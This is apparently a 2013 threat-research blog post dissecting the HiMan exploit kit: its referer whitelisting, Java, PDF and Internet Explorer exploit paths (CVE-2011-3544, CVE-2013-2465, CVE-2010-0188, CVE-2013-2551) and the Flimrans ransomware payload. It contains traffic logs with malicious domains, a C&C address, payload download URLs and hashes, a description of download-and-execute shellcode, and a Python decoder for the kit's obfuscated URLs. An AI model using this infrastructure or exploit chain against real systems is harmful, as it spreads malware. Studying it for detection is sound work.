2013-10-02 - Study HiMan Exploit Kit. Say Hi to one more.

For the Thumbnail
(just because it should be less boring)
from Eoin
(link to its presentation at ShmooCon 2013)
(link to github)

So HiMan is not the real name of this Exploit Kit. It seems to be High Load, but as HighLoad is a reputable security conference held in Russia, we won't use this name. (For the same kind of reasons, we now refer to what we previously called PopAds as Magnitude.)





HiMan EK login Screen - "Power by High Load, 2013"

I haven't heard about any public advert for this Exploit Kit, but ping me if there is one and you know where :)





What is tricky with this one is that there seems to be a whitelisting filter on the referer.

Wrong referer: bye! (Obviously wrong country, wrong browser, known IP... same way.)





HiMan driving you out.

Landing > jsdetect > window.location = out.

(don't know why it's not being done directly on the landing... are all stats-related functions in index?)





POST to index.php contains the upper referer.

POST to index with correct referer and fresh IP.

Studying this should help in knowing which pierced armor we must show HiMan in order to get all the bullets:





Conditions allow you to guess what will hit you.

except maybe for IE





CVE-2011-3544 : Java2 (because CVE-2013-2465 crashes older versions of JRE 6)



GET http://fifallllolka .info/xuguczel.php 200 OK (text/html)

GET http://fifallllolka .info/js/jquery.js 200 OK (application/javascript)

POST http://fifallllolka .info/index.php 200 OK (text/html)

java2 in HiMan 2013-10-02

We can easily see this in the noise:



GET http://fifallllolka .info/xufomav/b.jar 200 OK (application/java-archive) 378b01a6c3969089d0779aeb80185627





GET http://fifallllolka .info/com.class 404 Not Found (text/html)
GET http://fifallllolka .info/edu.class 404 Not Found (text/html)
GET http://fifallllolka .info/net.class 404 Not Found (text/html)
GET http://fifallllolka .info/org.class 404 Not Found (text/html)
GET http://fifallllolka .info/com.class 404 Not Found (text/html)
GET http://fifallllolka .info/edu.class 404 Not Found (text/html)
GET http://fifallllolka .info/net.class 404 Not Found (text/html)
GET http://fifallllolka .info/org.class 404 Not Found (text/html)

Getting System Properties for Stats Purposes

Piece of dwq.class in b.jar - HiMan 2013-10-02

And passing them to payload URLs

Piece of cdcdc44 class in b.jar - HiMan 2013-10-02

GET http://fifallllolka .info/xufomav/kds.php?ex=rhi&name=BOBOB&country=US&os=Windows+XP&ver=1.6.0_16 200 OK (application/octet-stream)





Payload is a zip





a.jar function to deal with the Zip payload

(didn't spend time on it)

containing Flimrans ransomware:





Flimrans these days

As is often the case with affiliates, it's the same icon across every infection vector:

built / packed at the same place

-----------Out of topic : Payload-----------

(A ransomware that seems to have been first pushed in Flimkit (as a dedicated family) in the middle of May 2013. This was the same kind of pairing as Kore with Urausy/FakeAV.

I will make a post about it really soon (it's here). It's starting to be widely spread.)



C&C : 95.211.239.222 16265 | 95.211.0.0/16 | LEASEWEB | NL | LEASEWEB.COM | LEASEWEB B.V.

GET /IccpytZxrc79KfIjQojAavSfYfhOBm4= HTTP/1.1 Host: utipiguty.de Cache-Control: no-cache





--------------------------------------------





CVE-2013-2465 : Java1

HiMan CVE-2013-2465 Successful path 2013-10-01

GET http://fifallllllolka .info/sacixudy.php 200 OK (text/html)

GET http://fifallllllolka .info/js/jquery.js 200 OK (application/javascript)

POST http://fifallllllolka .info/index.php 200 OK (text/html)

java1() in HiMan 2013-10-02

GET http://fifallllllolka .info/sivajup/a.jar 4c1aabd2f558c453555da5ff7a7559de 200 OK (application/java-archive)

Piece of CVE-2013-2465 in a.jar

GET http://fifallllllolka .info/sivajup/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+7&ver=1.6.0_45 200 OK (application/octet-stream)



CVE-2013-2465 with embedded jnlp (to avoid the Security Warning): java3

I'll fly over that one.

CVE-2013-2465 with embedded jnlp pass (the js size 0 is an artifact - cached)

GET http://fifalllolka .info/xalbigki.php 200 OK (text/html)

GET http://fifalllolka .info/js/jquery.js 304 Not Modified () (artifact - cached here)

POST http://fifalllolka .info/index.php 200 OK (text/html)

java3 in HiMan 2013-10-02



GET http://fifalllolka .info/jumyvvu/a.jar 4c1aabd2f558c453555da5ff7a7559de (same as previously) 200 OK (application/java-archive)

GET http://fifalllolka .info/jumyvvu/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+XP&ver=1.7.0_11 200 OK (application/octet-stream)



CVE-2010-0188 :





It's an assumption that it's libtiff (CVE-2010-0188), as there is an embedded file. Didn't spend enough time on it. Wepawet and VirusTotal were helpless here.

CVE-2010-0188 Successful pass in HiMan 2013-10-02

GET http://aakrinopidarasti .info/vibqilro.php 200 OK (text/html)

GET http://aakrinopidarasti .info/js/jquery.js 200 OK (application/javascript)

POST http://aakrinopidarasti .info/index.php 200 OK (text/html)

GET http://aakrinopidarasti .info/gadgepu/d.php?h=h11t11t11p11%3A11%2F11%2F11a11a11k11r11i11n11o11p11i11d11a11r11a11s11t11i11.11i11n11f11o11%2F11g11a11d11g11e11p11u11%2F11k11d11s11.11p11h11p11%3F11e11x11%3D11a11d11%2611n11a11m11e11%3D11B11O11B11O11B11%2611c11o11u11n11t11r11y11%3D11U11S11 200 OK (application/pdf)





HiMan's PDF in PDFStreamDumper.









The object after some light deobfuscation

(mainly replacing "hello prettylame iwnzzz" with %)

After the eval





<edit1 2013-10-03>



@kafeine I think the payload is the same, but depending on the Adobe reader version the exploit bytes change. hvkhhttgc will be shellcode..

— Jose Miguel Esparza (@EternalTodo) October 3, 2013

@kafeine Shellcode using XOR to decode itself, URLDownloadToCacheFileW to download and CreateProcess to execute it.

— Jose Miguel Esparza (@EternalTodo) October 26, 2013

</edit1>



GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US 200 OK (application/octet-stream) (same Flimrans)

GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US;1 200 OK (application/octet-stream)

[Have to stop here for now - will dig into it to find out why there are 2 payload calls]





CVE-2013-2551 : (working here....)

CVE-2013-2551 in HiMan - 2013-10-01

GET http://akrinopidarasti .info/wywetukr.php 200 OK (text/html)

GET http://akrinopidarasti .info/js/jquery.js 200 OK (application/javascript)

POST http://akrinopidarasti .info/index.php 200 OK (text/html)

IE Check Before Firing

(note: on another pass)

Cleaning to see a little better

(note: it's another pass so the pattern does not match this one)

GET http://akrinopidarasti .info/qywurro/sh.php?i=h79t79t79p79%3A79%2F79%2F79a79k79r79i79n79o79p79i79d79a79r79a79s79t79i79.79i79n79f79o79%2F79q79y79w79u79r79r79o79%2F79k79d79s79.79p79h79p79%3F79e79x79%3D79a79d79%2679n79a79m79e79%3D79B79O79B79O79B79%2679c79o79u79n79t79r79y79%3D79U79S79 200 OK (text/html)
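The i= value of this sh.php request and the h= value of the d.php request in the CVE-2010-0188 pass appear to use the same trick: the kds.php payload URL, percent-encoded, with the same two digits inserted after every character or %XX escape ("11" on that pass, "79" on this one). The Python below is an added example, not the kit's code nor anything from this post: it strips the key back out, URL-decodes the result, defangs the host the way domains are written here, and can be run over a proxied request path to pull such hidden URLs out; the two sample strings are copied from the requests quoted above.

```python
import re
from urllib.parse import unquote, urlsplit, urlunsplit

# Constructed sample input: the h= value of the d.php request and the i=
# value of the sh.php request quoted in the post (keys "11" and "79").
SAMPLE_D_PHP = ("h11t11t11p11%3A11%2F11%2F11a11a11k11r11i11n11o11p11i11d11a11r11a11"
                "s11t11i11.11i11n11f11o11%2F11g11a11d11g11e11p11u11%2F11k11d11s11.11"
                "p11h11p11%3F11e11x11%3D11a11d11%2611n11a11m11e11%3D11B11O11B11O11B11"
                "%2611c11o11u11n11t11r11y11%3D11U11S11")
SAMPLE_SH_PHP = ("h79t79t79p79%3A79%2F79%2F79a79k79r79i79n79o79p79i79d79a79r79a79s79"
                 "t79i79.79i79n79f79o79%2F79q79y79w79u79r79r79o79%2F79k79d79s79.79p79"
                 "h79p79%3F79e79x79%3D79a79d79%2679n79a79m79e79%3D79B79O79B79O79B79"
                 "%2679c79o79u79n79t79r79y79%3D79U79S79")

# One unit of the percent-encoded target (a %XX escape or a single
# character) followed by the two-digit key inserted after every unit.
UNIT_KEY = re.compile(r"(%[0-9A-Fa-f]{2}|.)(\d{2})", re.S)

def decode_himan_param(value):
    """Return (key, target_url); raise ValueError unless the value is made
    entirely of unit+key pairs sharing one key (so it doubles as a check)."""
    pairs = UNIT_KEY.findall(value)
    if "".join(unit + key for unit, key in pairs) != value:
        raise ValueError("not a sequence of unit+key pairs")
    keys = {key for _, key in pairs}
    if len(keys) != 1:
        raise ValueError("key changes inside the value: %s" % sorted(keys))
    return keys.pop(), unquote("".join(unit for unit, _ in pairs))

def defang(url):
    """Write the host as the post does ('host .info') so it is not clickable."""
    parts = urlsplit(url)
    head, sep, tld = parts.netloc.rpartition(".")
    return urlunsplit(parts._replace(netloc=f"{head} .{tld}" if sep else parts.netloc))

def extract_payload_urls(request_path):
    """Return the defanged payload URLs hidden with this encoding in the
    query string of a proxied request path (empty list when none)."""
    found = []
    for param in urlsplit(request_path).query.split("&"):
        _, _, value = param.partition("=")
        try:
            _, url = decode_himan_param(value)
        except ValueError:
            continue
        if urlsplit(url).scheme in ("http", "https"):
            found.append(defang(url))
    return found
```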

Piece of CVE-2013-2551



GET http://37.200.65.58/222.exe 200 OK (application/octet-stream) 92c2ad1ca04e431100313b9468842c0d Content-Length: 1536

VT TimeStamp

What happens once "infected"?





CVE-2013-2551 Payload





Exploitation Graph :

Files :